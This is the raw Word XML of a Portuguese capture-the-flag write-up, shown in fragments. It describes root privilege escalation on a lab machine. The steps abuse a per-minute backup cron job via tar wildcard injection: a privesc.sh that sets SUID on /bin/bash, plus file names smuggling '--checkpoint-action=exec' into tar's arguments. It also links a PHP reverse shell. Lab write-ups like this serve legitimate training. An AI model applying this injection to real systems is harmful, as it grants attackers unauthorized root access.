          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“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backup.sh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Forte"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="006F73AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, e observa-se que um script está sen</w:t>
      </w:r>
      <w:r w:rsidR="00213468">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">do executado a cada minuto. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD9032D" w14:textId="77777777" w:rsidR="00213468" w:rsidRDefault="0021346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Rode estes </w:t>
      </w:r>
      <w:r w:rsidRPr="00213468">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="171717" w:themeColor="background2" w:themeShade="1A"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="30"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>comandos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diretório /var/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www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/html </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035BBCE7" w14:textId="77777777" w:rsidR="00213468" w:rsidRDefault="00213468" w:rsidP="00DD1392">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
        </w:rPr>
      </w:pP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printf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</w:t>
      </w:r>
      <w:proofErr w:type="gram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#!/</w:t>
      </w:r>
      <w:proofErr w:type="gram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bin/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\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nchmod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+s /bin/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privesc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>.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r w:rsidRPr="00213468">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:i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"-</w:t>
      </w:r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-checkpoint-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action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exec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privesc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.sh"</w:t>
      </w:r>
      <w:r w:rsidRPr="00213468">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"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Comando usado:</w:t>
      </w:r>
      <w:r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&gt;&gt; --checkpoint=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716A9E71" w14:textId="77777777" w:rsidR="00213468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Entre no diretório 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miles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novamente e execute o comando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ter acesso root.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224D3B8E" w14:textId="77777777" w:rsidR="006636FF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-l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F27CA6" w14:textId="77777777" w:rsidR="006636FF" w:rsidRPr="006F73AC" w:rsidRDefault="006636FF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</w:p>
    <w:p w14:paraId="7CA49968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817791D" wp14:editId="278E0881">
            <wp:extent cx="5400040" cy="376683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852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EE914D5" wp14:editId="1ED0EC4C">
            <wp:extent cx="5400040" cy="34564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046" w14:textId="77777777" w:rsidR="00D20060" w:rsidRDefault="00D20060">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BBCD924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76E32081" w14:textId="77777777" w:rsidR="00D20060" w:rsidRDefault="006636FF">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">O CTF em si não é difícil, o que o torna um pouco mais chato é a escalação de privilégio dele, porém nada </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>impossível 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262DA52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55E2D2B" w14:textId="77777777" w:rsidR="006F73AC" w:rsidRDefault="006F73AC" w:rsidP="006F73AC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664AA5">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://pentestmonkey.net/tools/web-shells/php-reverse-shell?ref=blog.tryhackme.com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6F73AC">
      <w:headerReference w:type="default" r:id="rId32"/>
      <w:footerReference w:type="default" r:id="rId3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3E9C64" w14:textId="77777777" w:rsidR="00496E4E" w:rsidRDefault="00496E4E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="6B8737EA" w14:textId="77777777" w:rsidR="00496E4E" w:rsidRDefault="0049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18F88" w14:textId="77777777" w:rsidR="00D20060" w:rsidRDefault="00AC4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47011B" w14:textId="77777777" w:rsidR="00496E4E" w:rsidRDefault="00496E4E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="12805E76" w14:textId="77777777" w:rsidR="00496E4E" w:rsidRDefault="00496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A496B" w14:textId="77777777" w:rsidR="00D20060" w:rsidRDefault="00AC45F8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55DE41A" wp14:editId="2E04A066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28A32B7" wp14:editId="0AC838CD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4BF5402" w14:textId="77777777" w:rsidR="00D20060" w:rsidRDefault="00D200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0060"/>
    <w:rsid w:val="00057666"/>
    <w:rsid w:val="000E2A5E"/>
    <w:rsid w:val="00150B1D"/>
    <w:rsid w:val="001B1B77"/>
    <w:rsid w:val="00213468"/>
    <w:rsid w:val="003877C7"/>
    <w:rsid w:val="003938D9"/>
    <w:rsid w:val="00496E4E"/>
    <w:rsid w:val="00611DAF"/>
    <w:rsid w:val="00625C40"/>
    <w:rsid w:val="006636FF"/>
    <w:rsid w:val="006A1456"/>
    <w:rsid w:val="006C795F"/>
    <w:rsid w:val="006E68C0"/>
    <w:rsid w:val="006F73AC"/>
    <w:rsid w:val="00703669"/>
    <w:rsid w:val="00745D95"/>
    <w:rsid w:val="00780A57"/>
    <w:rsid w:val="007B4878"/>
    <w:rsid w:val="007D4C84"/>
    <w:rsid w:val="00963711"/>
    <w:rsid w:val="00AC45F8"/>
    <w:rsid w:val="00B1782E"/>
    <w:rsid w:val="00B60B06"/>
    <w:rsid w:val="00BF5AC8"/>
    <w:rsid w:val="00C539C9"/>
    <w:rsid w:val="00C80A73"/>
    <w:rsid w:val="00CA7514"/>
    <w:rsid w:val="00D20060"/>
    <w:rsid w:val="00D46938"/>
    <w:rsid w:val="00DC433B"/>
    <w:rsid w:val="00DD1392"/>
    <w:rsid w:val="00E505AC"/>
    <w:rsid w:val="00E854D5"/>
    <w:rsid w:val="00E95723"/>
    <w:rsid w:val="00EF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EDD44"/>
  <w15:docId w15:val="{0B79EEBD-5D33-49C1-B5A7-B236623E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A5E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A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456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F73AC"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-builtin">
    <w:name w:val="hljs-built_in"/>
    <w:basedOn w:val="Fontepargpadro"/>
    <w:rsid w:val="00213468"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-string">
    <w:name w:val="hljs-string"/>
    <w:basedOn w:val="Fontepargpadro"/>
    <w:rsid w:val="0021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entestmonkey.net/tools/web-shells/php-reverse-shell?ref=blog.tryhackme.com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entestmonkey.net/tools/web-shells/php-reverse-shell?ref=blog.tryhackm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891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João Vitor Choueri Branco</cp:lastModifiedBy>
  <cp:revision>10</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-07-18T09:19:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-11-04T22:41:00Z</dcterms:modified>
</cp:coreProperties>
</file>